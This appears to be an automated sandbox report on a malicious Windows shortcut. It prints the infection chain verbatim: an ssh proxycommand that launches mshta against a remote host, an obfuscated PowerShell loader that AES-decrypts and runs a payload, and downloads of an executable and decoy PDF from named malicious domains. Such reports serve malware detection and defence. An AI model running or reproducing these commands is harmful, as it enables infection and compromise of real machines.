Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Mcyga.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\bdd.exe "C:\Users\user\AppData\Roaming\bdd.exe" Jump to behavior
Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command 'kqoxxi}}=eh>yz1>9jmshta https://static.klipxuhaq.shop/bux6p.mp4kqoxxi}}=eh>yz1>9j'.substring(18, 45)" .
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function albv($auxrs){return -split ($auxrs -replace '..', '0x$& ')};$jqlq = albv('a2c48681d2459656e4692303b9bc7cff6e08a10a018431979198d25a52f894f6dc443732b0c3354905be975423f38084d2727cbf0dac9b616709f076910568402e1b28ef5d32b51c2ac725a34041cb2c720ac989db2e62000fd988905e1a6389fb0d52e37d7c2115dd226b708311260031e5fe6bc8bc5e87908c3714aabd2f115c12d362819a4e916feed235a129fbf323d36de4ad902e8c8a51a233d5853e42f28657de3ed15211bfe6941dbd1c7f025630974368a83fd5de963ef1e91efd56dbfa68ad8063783d6639f87d1fe6bfd099bbe5a6d9601ef7ec17fda43d8ae527d0296119ad7ebf32fd111a12dbb01041deb9bad02400a8b21a164e61a0c5eebf6eba6731a52636245a483b65ef09c62369bf5f6779155aff4ae3c49130512d33c4a447294185b0af3f2dc5bfd7040c32f45793ca424e8dc070d428b1e88ae756b7d81c20e90e56a70c92c46b646db06d5d809f597fcb0b2a835686434f9b8ee1346022a7e67a5ff1e93282dd685ddba750b164855122cfe1595d8d4c626ccdc95d069d378f11d1d01cee44578bb248b707df3936ce1150d5a850e2c59d2b6ea91d541c5fa289284f984d5ef5f1bbae1c95e6cd4d479d18168f4f5a1f6a3d2516c97548490fe4ede1e8fbd46026bf7c44f92b74e23bff805094490db237a8fba52231fa45c8d0cade12ce630f42ad7d6c814eac9911b70168a211c18f648329e6e5d0e31f6a222ba929c78e74d5a726ab7bd0489d0e553eaa929c4c481cf50df1b3a85b394d77767c3d76038df4ef9df6ddcf5254204467b039593f4a73aa3964076f9237db55dc43bae2e0a12466d7f7ba453418aa783574d20bd5a3ed874800b10605deaa6fc471ab3b4a8822c688a244da7a4cb28555df5ffd93045a4154386bdc999322dc1d7dad002e13c7b2273236812a6e335c1646d87460f8997e340c4ef0b462c6f9e2a290fd703294de51c6349ec9da9ced11400f78ccffa21f2b7a01319f1af67bd8795b27f817e01a0ee0045366397548b1c18343e85d61f0e81f6554e60f30c03986021e0b29eebacfd5a055f6a04bde3fb67d9f1bbf0c59cd41d646ff685434e25b463effb769528bee');$pupw=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((albv('45625942537170514679715a53476565')),[byte[]]::new(16)).transformfinalblock($jqlq,0,$jqlq.length)); & $pupw.substring(0,3) $pupw.substring(257)
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function albv($auxrs){return -split ($auxrs -replace '..', '0x$& ')};$jqlq = albv('a2c48681d2459656e4692303b9bc7cff6e08a10a018431979198d25a52f894f6dc443732b0c3354905be975423f38084d2727cbf0dac9b616709f076910568402e1b28ef5d32b51c2ac725a34041cb2c720ac989db2e62000fd988905e1a6389fb0d52e37d7c2115dd226b708311260031e5fe6bc8bc5e87908c3714aabd2f115c12d362819a4e916feed235a129fbf323d36de4ad902e8c8a51a233d5853e42f28657de3ed15211bfe6941dbd1c7f025630974368a83fd5de963ef1e91efd56dbfa68ad8063783d6639f87d1fe6bfd099bbe5a6d9601ef7ec17fda43d8ae527d0296119ad7ebf32fd111a12dbb01041deb9bad02400a8b21a164e61a0c5eebf6eba6731a52636245a483b65ef09c62369bf5f6779155aff4ae3c49130512d33c4a447294185b0af3f2dc5bfd7040c32f45793ca424e8dc070d428b1e88ae756b7d81c20e90e56a70c92c46b646db06d5d809f597fcb0b2a835686434f9b8ee1346022a7e67a5ff1e93282dd685ddba750b164855122cfe1595d8d4c626ccdc95d069d378f11d1d01cee44578bb248b707df3936ce1150d5a850e2c59d2b6ea91d541c5fa289284f984d5ef5f1bbae1c95e6cd4d479d18168f4f5a1f6a3d2516c97548490fe4ede1e8fbd46026bf7c44f92b74e23bff805094490db237a8fba52231fa45c8d0cade12ce630f42ad7d6c814eac9911b70168a211c18f648329e6e5d0e31f6a222ba929c78e74d5a726ab7bd0489d0e553eaa929c4c481cf50df1b3a85b394d77767c3d76038df4ef9df6ddcf5254204467b039593f4a73aa3964076f9237db55dc43bae2e0a12466d7f7ba453418aa783574d20bd5a3ed874800b10605deaa6fc471ab3b4a8822c688a244da7a4cb28555df5ffd93045a4154386bdc999322dc1d7dad002e13c7b2273236812a6e335c1646d87460f8997e340c4ef0b462c6f9e2a290fd703294de51c6349ec9da9ced11400f78ccffa21f2b7a01319f1af67bd8795b27f817e01a0ee0045366397548b1c18343e85d61f0e81f6554e60f30c03986021e0b29eebacfd5a055f6a04bde3fb67d9f1bbf0c59cd41d646ff685434e25b463effb769528bee');$pupw=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((albv('45625942537170514679715a53476565')),[byte[]]::new(16)).transformfinalblock($jqlq,0,$jqlq.length)); & $pupw.substring(0,3) $pupw.substring(257)Jump to behavior
Source: powershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: Shell_TrayWndUser32GetDpiForWindow
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\dfac2112 VolumeInformation
Source: C:\Windows\System32\OpenSSH\ssh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter		1
DLL Side-Loading		12
Process Injection		11
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		Boot or Logon Initialization Scripts1
Abuse Elevation Control Mechanism		31
Virtualization/Sandbox Evasion		LSASS Memory12
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		12
Process Injection		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Multi-hop Proxy		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Abuse Elevation Control Mechanism		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeylogging13
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials23
System Information Discovery		VNCGUI Input Capture1
Proxy		Data Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576539 Sample: tz1WicW6sG.lnk Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 51 static.klipxuhaq.shop 2->51 53 x1.i.lencr.org 2->53 55 2 other IPs or domains 2->55 65 Multi AV Scanner detection for domain / URL 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 Antivirus detection for URL or domain 2->69 71 6 other signatures 2->71 13 ssh.exe 2 2->13         started        16 svchost.exe 1 1 2->16         started        signatures3 process4 dnsIp5 85 Windows shortcut file (LNK) starts blacklisted processes 13->85 19 powershell.exe 7 13->19         started        22 conhost.exe 1 13->22         started        49 127.0.0.1 unknown unknown 16->49 signatures6 process7 signatures8 73 Windows shortcut file (LNK) starts blacklisted processes 19->73 75 Powershell drops PE file 19->75 24 powershell.exe 7 19->24         started        process9 signatures10 79 Windows shortcut file (LNK) starts blacklisted processes 24->79 27 mshta.exe 16 24->27         started        process11 dnsIp12 57 static.klipxuhaq.shop 104.21.48.1, 443, 49711 CLOUDFLARENETUS United States 27->57 81 Windows shortcut file (LNK) starts blacklisted processes 27->81 83 Suspicious powershell command line found 27->83 31 powershell.exe 17 21 27->31         started        signatures13 process14 dnsIp15 59 qu.ax 188.245.211.225, 443, 49714 PARSONLINETehran-IRANIR Iran (ISLAMIC Republic Of) 31->59 61 denek.local-wanderer.shop 188.114.96.6, 443, 49716 CLOUDFLARENETUS European Union 31->61 47 C:\Users\user\AppData\Roaming\bdd.exe, PE32+ 31->47 dropped 63 May use the Tor software to hide its network traffic 31->63 36 bdd.exe 31->36         started        39 Acrobat.exe 79 31->39         started        41 conhost.exe 31->41         started        file16 signatures17 process18 signatures19 77 Found direct / indirect Syscall (likely to bypass EDR) 36->77 43 AcroCEF.exe 109 39->43         started        process20 process21 45 AcroCEF.exe 6 43->45         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
tz1WicW6sG.lnk42%VirustotalBrowse
tz1WicW6sG.lnk37%ReversingLabsShortcut.Trojan.Pantera

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\bdd.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
static.klipxuhaq.shop0%VirustotalBrowse
denek.local-wanderer.shop14%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://static.klipxuhaq.shop/BUX6P.mp4a0%Avira URL Cloudsafe
https://static.k0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4Y0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4LMEMPX0%Avira URL Cloudsafe
http://isr.itopupdate.com/check.php0%Avira URL Cloudsafe
https://s3.amazonaws.com/myfilelist/list0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi0%VirustotalBrowse
https://static.klipxuhaq.shop/BUX6P.mp4p0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4h0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4j0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4C0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4?0%Avira URL Cloudsafe
http://www.borland.com/namespaces/Types0%Avira URL Cloudsafe
https://streams.videolan.org/upload/0%Avira URL Cloudsafe
https://denek.local-wanderer.shop100%Avira URL Cloudmalware
https://static.klipxuhaq.shop/BUX6P.mp4ojrdtj0%Avira URL Cloudsafe
https://denek.local-wanderer.shop/bdd.exe100%Avira URL Cloudmalware
http://denek.local-wanderer.shop100%Avira URL Cloudmalware
https://static.klipxuhaq.shop/BUX6P.mp4...J0%Avira URL Cloudsafe
https://denek.local-wander0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4C:0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp4800%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4880%Avira URL Cloudsafe
http://www.CCAVC.com0%Avira URL Cloudsafe
https://denek.lo0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4pehpv0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4indows0%Avira URL Cloudsafe
http://www.DelphiFFmpeg.com0%Avira URL Cloudsafe
https://denek.local-wanderer.shop/bdd.exep100%Avira URL Cloudmalware
http://pyfpdf.googlecode.com/)0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4$global:?0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4.exeDrive0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp40%Avira URL Cloudsafe
https://static.klipxuhaq.shop/0%Avira URL Cloudsafe
https://denek.local-wanderer.shop/bdd.exe~100%Avira URL Cloudmalware
https://static.klipxuhaq.shop/BUX6P.mp4ional0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4...0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp40%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuh0%Avira URL Cloudsafe
https://static.klipxuhaq.shop/BUX6P.mp4=https://static.klipxuhaq.shop/BUX6P.mp4130%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
static.klipxuhaq.shop
104.21.48.1
truetrueunknown
denek.local-wanderer.shop
188.114.96.6
truefalseunknown
qu.ax
188.245.211.225
truefalse
    		high
    x1.i.lencr.org
    		unknown
    		unknownfalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://denek.local-wanderer.shop/bdd.exetrue
      • Avira URL Cloud: malware
      		unknown
      https://static.klipxuhaq.shop/BUX6P.mp4true
      • Avira URL Cloud: safe
      		unknown
      https://qu.ax/Mcyga.pdffalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://qu.axpowershell.exe, 00000008.00000002.2671803859.000001EEC5230000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://static.klipxuhaq.shop/BUX6P.mp4apowershell.exe, 00000004.00000002.2352910350.000001D9D7193000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://static.klipxuhaq.shop/BUX6P.mp4kqOxxissh.exe, 00000000.00000002.2889964297.0000017B073E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, tz1WicW6sG.lnktrue
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://static.kpowershell.exe, 00000004.00000002.2350655084.000001D9BF500000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2350655084.000001D9BF55B000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://static.klipxuhaq.shop/BUX6P.mp4LMEMPXmshta.exe, 00000005.00000002.2888526113.0000015CF87CD000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://static.klipxuhaq.shop/BUX6P.mp4Ypowershell.exe, 00000004.00000002.2348522038.000001D9BD087000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://isr.itopupdate.com/check.phppowershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://s3.amazonaws.com/myfilelist/listpowershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://goto.itopupdate.com/appgoto?name=isrpowershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drfalse
            		high
            https://contoso.com/Licensepowershell.exe, 00000008.00000002.2750580116.000001EED3634000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://schemas.xmlsoap.org/soap/envelope/bdd.exe.8.drfalse
                		high
                https://goto.itopupdate.com/onlinepowershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drfalse
                  		high
                  http://ip-api.com/powershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drfalse
                    		high
                    https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000007.00000003.2380051472.0000028796BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://static.klipxuhaq.shop/BUX6P.mp4ppowershell.exe, 00000004.00000002.2350655084.000001D9BF051000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2883113803.0000015CF8A6D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://static.klipxuhaq.shop/BUX6P.mp4jpowershell.exe, 00000004.00000002.2350537645.000001D9BED00000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://static.klipxuhaq.shop/BUX6P.mp4hmshta.exe, 00000005.00000003.2877286551.00000154F1D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2882216355.00000154F1D4E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2877918246.00000154F1D2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2885295855.00000154F1D4F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2885242674.00000154F1D2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2881397937.00000154F1D2D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000007.00000003.2380051472.0000028796C28000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://aka.ms/vs/17/release/vc_redist.x64.exepowershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drfalse
                          		high
